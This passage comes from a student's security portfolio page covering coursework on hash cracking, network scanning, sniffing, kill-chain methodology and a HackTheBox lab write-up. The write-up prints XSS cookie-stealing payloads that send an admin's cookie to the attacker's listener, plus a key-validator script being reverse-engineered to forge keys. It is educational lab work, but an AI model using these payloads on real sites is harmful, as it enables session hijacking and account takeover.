          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
